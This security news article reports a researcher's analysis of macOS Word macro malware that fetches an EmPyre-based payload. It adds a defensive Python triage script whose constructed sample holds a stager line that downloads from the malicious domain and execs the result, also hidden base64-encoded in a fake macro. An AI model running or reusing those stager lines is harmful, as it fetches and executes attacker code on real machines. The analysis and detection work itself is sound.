SecurityWeek | Malware & Threats

Macro Malware Comes to macOS

After becoming a common occurrence on Windows-based computers over the past few years, malware that abuses macro-enabled Microsoft Office documents to spread is now targeting macOS users too.


Malicious macros in Office documents have been used to spread malware for over a decade, but their use dropped significantly after Microsoft disabled macros by default in Office 2007. A couple of years ago, however, the use of such macros recommenced, as cybercriminals started leveraging various social engineering techniques to trick users into enabling the macros.

Until now, only Windows users were targeted in such attacks, but it appears that actors building malware for Mac systems also decided to adopt the technique recently. According to Patrick Wardle, Director of Research at Synack, such an attack was recently carried out via a Word document named “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.docm.”

By using ClamAV's sigtool to extract the embedded macros, the researcher found Python code designed to perform a series of checks on the potential victim's machine before it fetches and executes the malicious payload. As soon as the user opens the document in Word for Mac with macros enabled, the Fisher function runs automatically.

The Fisher function was observed to decode a base64 chunk of data and then execute it via Python. The Python code, which appears to have been copied from the open-source EmPyre project, checks the machine to make sure LittleSnitch is not running, downloads the second-stage payload (from hxxps[:]//www.securitychecking.org:443/index[.]asp), then RC4 decrypts this payload and executes it.
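As an added illustration of how a defender might triage such a document, the following Python (example code written for this article, not part of Wardle's analysis or the EmPyre project) checks whether a .docm package is macro-enabled, decodes any long base64 chunk found in extracted macro text, and scores the result against the stager traits described above (the LittleSnitch check, the download domain, RC4 and exec). The sample document and macro it builds are constructed stand-ins, not the real file.

```python
import base64
import io
import re
import zipfile

# Indicators taken from the stager behaviour the article describes: the LittleSnitch
# check, the download domain, RC4 decryption and exec of the fetched payload.
INDICATORS = ["LittleSnitch", "securitychecking.org", "rc4", "urllib", "exec(", "base64"]
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # long base64 runs inside macro text

def has_vba_project(docm_bytes: bytes) -> bool:
    """True if the OOXML package carries a VBA project, i.e. the file is macro-enabled."""
    with zipfile.ZipFile(io.BytesIO(docm_bytes)) as z:
        return any(name.endswith("vbaProject.bin") for name in z.namelist())

def decode_b64_blobs(macro_text: str) -> list:
    """Decode every long base64 run in extracted macro source, skipping invalid ones."""
    decoded = []
    for match in B64_RE.finditer(macro_text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
            decoded.append(raw.decode("utf-8", errors="replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return decoded

def triage_macro(macro_text: str) -> dict:
    """Score the macro text plus any payload it hides in base64 against INDICATORS."""
    corpus = [macro_text] + decode_b64_blobs(macro_text)
    hits = sorted({ind for text in corpus for ind in INDICATORS if ind.lower() in text.lower()})
    return {"payloads": len(corpus) - 1, "hits": hits, "suspicious": len(hits) >= 2}

def constructed_sample() -> tuple:
    """Constructed test data (not the real document): a minimal macro-enabled package and
    a macro that, like the Fisher function, hides a Python stager in a base64 chunk."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/vbaProject.bin", b"\x00" * 16)  # placeholder, not real VBA
    stager = ("import urllib2\n"  # sample text only; it is scanned, never executed
              "if 'LittleSnitch' in ps_output: sys.exit()\n"
              "data = urllib2.urlopen('https://www.securitychecking.org/index.asp').read()\n"
              "exec(rc4(key, data))\n")
    blob = base64.b64encode(stager.encode()).decode()
    macro = "Sub Fisher()\n    cmd = \"python -c \"\"import base64;exec(base64.b64decode('" + blob + "'))\"\"\"\nEnd Sub\n"
    return buf.getvalue(), macro
```

Two or more indicator hits across the macro and its decoded payload mark the sample as suspicious; a plain AutoOpen stub with no embedded blob scores zero.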

While EmPyre is a known open-source multi-stage post-exploitation agent “built on cryptologically-secure communications,” it’s unknown what the second-stage payload included, as the file wasn’t available during analysis. While it might have been another EmPyre component, this payload could have been something entirely different as well.

“The second-stage component of Empyre is the persistent agent that affords a remote attacker continuing access to an infected host,” the researcher says. For persistence, a cron job, dylib hijack, launch daemon, or login hook is likely used.

“The persistent component of EmPyre can also be configured to run a wide range of EmPyre modules. These modules allow the attacker to perform a myriad of nefarious actions such as enabling the webcam, dumping the keychain, and accessing a user’s browser history,” the researcher notes.


The IP associated with the securitychecking(.)org website that hosts the malicious payload appears to be geolocated in Russia and was previously associated with phishing.

While the malware used in this attack isn’t particularly advanced, as it relies on user interaction to open the malicious document in Microsoft Word and enable macros, it also uses an open-source implant that is likely to be easily detected. However, the use of social engineering is noteworthy, especially since it exploits the weakest link in the chain, namely the human element.

“And moreover, since macros are ‘legitimate’ functionality (vs. say a memory corruption vulnerability), the malware’s infection vector doesn’t have to worry about crashing the system nor being ‘patched’ out,” the researcher concludes.

Related: Mac OS Malware, Web-based Threats Decline: Report

Related: Site of BitTorrent App “Transmission” Again Used to Deliver OS X Malware

Written by Ionut Arghire, an international correspondent for SecurityWeek.
